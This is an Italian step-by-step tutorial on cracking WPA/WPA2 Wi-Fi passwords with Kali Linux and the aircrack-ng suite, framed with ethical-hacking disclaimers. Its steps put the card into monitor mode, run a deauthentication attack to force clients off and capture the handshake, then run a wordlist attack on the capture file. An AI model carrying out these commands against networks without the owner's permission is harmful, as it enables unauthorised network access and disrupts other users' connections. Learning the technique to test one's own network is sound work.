Hackerare Wifi con Kali Linux

Hackerare il wifi praticamente è facile con una buona wordlist. Ma questa wordlist non serve a nulla finché non abbiamo alcuna idea di come usarla effettivamente per crackare un hash. E prima di crackare l’hash, in realtà dobbiamo generarlo. Quindi, di seguito sono riportati quei passaggi insieme a alcune buone wordlist per crackare un wifi WPA/WPA2.

Nota: Utilizzare i metodi seguenti solo a scopo educativo/sperimentale sul proprio wifi o con il permesso del proprietario. Non utilizzare questi passaggi a scopo fraudolento.

Step 1: Avvia Kali Linux. Apri la finestra del terminale. E esegui i seguenti passaggi.

ifconfig

Il comando ifconfig (configurazione dell’interfaccia) serve a visualizzare o modificare la configurazione delle interfacce di rete sul tuo sistema.

Hackerare Wifi con Kali Linux

Nella schermata del terminale potrai vedere una cosa simile

  • eth0 : Interfaccia Ethernet
  • l0 : Interfaccia Loopback
  • wlan0 : La prima interfaccia wirelwss del tuo computer. (Questo è ciò che cerchi)

Step 2. Stop ai processi che sono avviati sulla interfaccia wireless

Esegui il comando sul terminale:

airmon-ng check kill

Step 3: Fai partire in modalità monitor l’interfaccia wireless che hai individuato nello Step 1. D’ora in poi qui troverai i comandi sul terminale per wlan0 (la mia interfaccia), non dovrai fare altro che sostituire quest’ultima parte dei comandi con la tua.

Digita questo comando sul terminale:

airmon-ng start wlan0

Hackerare Wifi con Kali Linux

Step 4: Individua tutte le reti WiFi intorno a te con questo comando:

airodump-ng wlan0mon

Hackerare Wifi con Kali Linux

Qui potrai vedere:

  • airodump-ng : Per la cattura dei pacchetti dati
  • wlan0mon : Il nome dell’interfaccia (questa, come ho già detto sopra potrebbe essere diversa sul tuo computer)

Premi Ctrl+C per fermare il processo dopo aver individuato la rete che ti interessa. In questo caso la rete è cerchiata in rosso nell’immagine precedente.

Step 5: Visualizza i client connessi alla rete che hai individuato; esegui sul terminale il seguente comando:

airodump-ng -c 1 –bssid 80:35:C1:13:C1:2C -w /root wlan0mon

Hackerare Wifi con Kali Linux

Qui hai:

  • airodump-ng : Pacchetti Catturati
  • -c : Canale
  • –bssid : MAC address del wireless access point(WAP).
  • -w : La directory dove verranno salvati i file (Password File).
  • wlan0mon : Il nome dell’interfaccia.

Step 6: Apri una nuova finestra Terminale e digita il seguente comando per stare in attesa dell’handshake:

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon

Hackerare Wifi con Kali Linux

Quando il client è disconnesso dalla rete di destinazione e tenta di riconnettersi alla rete nuovamente otterrai qualcosa chiamato handshake WPA nella finestra precedente del terminale.

Ora abbiamo finito di catturare i pacchetti. Quindi, ora puoi chiudere la finestra del terminale.

Step 7. Decriptiamo la password. Apri l’applicazione File.

Il file che cerchi avrà un nome simile hacking-01.cap

Esegui questo comando dal terminale (ricordati sempre di sostituire il nome del file col file che hai trovato prima)

aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap

In questo comando hai:

  • aircrack-ng : 802.11 WEP and WPA-PSK programma per craccare le chiavi
  • -a : -a2 per WPA2 & -a per WPA network
  • -b : Il BSSID della rete scelta
  • -w : il percorso della wordlist con le password più comuni
  • /root/hacking-01.cap : Il percorso del file catturato

Puoi scaricare il file delle password comuni (nel mio caso passwords.txt) da Internet o se desideri creare il tuo file utilizzando lo strumento Crunch. Il risultato finale sarà questo:

Hackerare Wifi con Kali Linux

Attenzione! Il contenuto di questo articolo è a scopo puramente informativo: l’uso illegale di pratiche e software che permettono la violazione dei protocolli di sicurezza è severamente punito dalla legge.

L’autore declina ogni responsabilità sull’uso improprio dei contenuti. CyberAngel si prefissa lo scopo di divulgare pratiche di Ethical Hacker per migliorare la sicurezza degli utenti e mai per commettere crimini e reati informatici.